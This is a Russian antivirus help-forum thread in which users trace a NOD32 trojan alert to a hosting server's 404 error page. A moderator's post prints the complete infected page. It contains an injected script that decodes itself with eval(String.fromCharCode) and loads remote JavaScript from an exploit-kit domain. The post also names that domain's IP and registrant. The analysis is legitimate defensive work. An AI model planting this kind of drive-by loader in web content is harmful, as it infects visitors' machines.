Показано с 1 по 5 из 5.

Нод обнаруживает непонятный вирус на сайте! (заявка № 79986)

  1. #1
    Junior Member Репутация
    Регистрация
    27.05.2010
    Сообщений
    6
    Вес репутации
    24

    Нод обнаруживает непонятный вирус на сайте!

    Не знаю по адресу я обратился или нет.
    Суть.
    По адресу www.sonat-energo.ru (сам состряпал) Нод обнаруживает при заходе (2 атаки) некую зловредную программу троян Agent.Ntw файл favicon.ico.
    Позвонил в хостинг, там сказали, что просто надо убрать из скриптов ссылку.
    В скриптах сайте покапался никаких айфрейм и прочих ссылок нет, все вроде чисто. На фтп зашел данный файл не обнаружил...
    Зашел на специальные серверы проверить заражен или нет данный сайт - пишут, что нет...как так?
    Может у кого какие-нибудь идеи, решения есть? Заранее спасибо.
    Последний раз редактировалось AndreyKa; 02.06.2010 в 13:27.

  2. Реклама
     

  3. #2
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1288
    А вы туда свою favicon.ico не подкладывали? Есть мнение, что вредоносный код живёт на станице, которую сервер выдаёт для кода 404.

  4. #3
    Junior Member Репутация
    Регистрация
    27.05.2010
    Сообщений
    6
    Вес репутации
    24
    Цитата Сообщение от pig Посмотреть сообщение
    А вы туда свою favicon.ico не подкладывали? Есть мнение, что вредоносный код живёт на станице, которую сервер выдаёт для кода 404.
    Я в этом полный ламер
    Ничего не выкладывал и что за файл favicon.ico тоже не имею представления. 404 это вроде не найден? т.е. вирус скрывает место закачки?
    Как быть, можете подробнее написать?

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1288
    У вас на сайте не найден файл иконки сайта - favicon.ico, который если есть, то лежит в корне сайта. Посмотрите, какой симпатичный значок у virusinfo.info - это та самая иконка и есть. У вас её нет, поэтому на запрос браузера сервер отвечает кодом 404 и специальной страницей. Вот на ней NOD и ловит гадость. Донесите эту мысль до администраторов хостера.
    Можно упростить ситуацию - запросить несуществующую страницу и получить детект в более прозрачном виде.

    P.S. Я этот скрипт увидел.

  6. #5
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    17.09.2004
    Сообщений
    1,664
    Вес репутации
    736
    Да, именно так, спасибо, Игорь.
    Код:
    Date: Wed, 02 Jun 2010 13:00:10 GMT
    Server: Apache/2.2.3 (Red Hat)
    Last-Modified: Thu, 25 Feb 2010 22:53:52 GMT
    ETag: "1b7d0a5-6f4-a81ee000"
    Accept-Ranges: bytes
    Content-Length: 1780
    Keep-Alive: timeout=30, max=500
    Connection: Keep-Alive
    Content-Type: text/html
    
    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <BODY> <kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>eval(String.fromCharCode(102,117,110
    ,99,116,105,111,110,32,108,106,115,40,41,123,116,114,121,123,118,97,114,32,115,61,100,111,99,117,1
    09,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34
    ,41,59,115,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,115,114,99,34,44,34,104,116,116,
    112,58,47,47,115,97,101,103,104,105,101,98,101,101,115,105,111,103,111,104,46,105,110,58,51,49,50,
    57,47,106,115,34,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,
    67,104,105,108,100,40,115,41,125,99,97,116,99,104,40,101,41,123,125,125,115,101,116,84,105,109,101
    ,111,117,116,40,34,108,106,115,40,41,34,44,53,48,48,41,59));</script></kJNPAGyUfwlpmhli1o6kENwBUZT
    INEoUZ5KH6vuxrkQU5>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at sonat.su
    </ADDRESS>
    </BODY>
    </HTML>
    т.е. троянский скрипт внедрен на этот самый Web Server at sonat.su, им и надо об этом сообщить.
    внедрен в код страницы, которая выдается по ошибке 404.

    Добавлено через 10 минут

    скрипт уже старый, февральский. Давно нету уже сайта, на который он вёл:
    saeghiebeesiogoh.in. 89.248.168.168. hosted-by-ecatel.net, Directs to exploit kit. Anton G Silivjorstov / 9vkrona@mail.ru. 2010-02-26
    Последний раз редактировалось Alexey P.; 02.06.2010 в 17:13. Причина: Добавлено

  • Уважаемый(ая) Денис2010, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Ответов: 1
      Последнее сообщение: 30.08.2011, 14:47
    2. Браузеры обнаруживает вирус
      От ipalexey в разделе Помогите!
      Ответов: 19
      Последнее сообщение: 24.06.2011, 08:16
    3. Постоянно обнаруживает вирус на компе.
      От масяня в разделе Помогите!
      Ответов: 25
      Последнее сообщение: 22.08.2009, 12:16
    4. Ответов: 10
      Последнее сообщение: 21.08.2009, 14:04
    5. AVZ не обнаруживает вирус
      От Scooter в разделе Антивирусы
      Ответов: 5
      Последнее сообщение: 15.01.2008, 14:56

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01405 seconds with 20 queries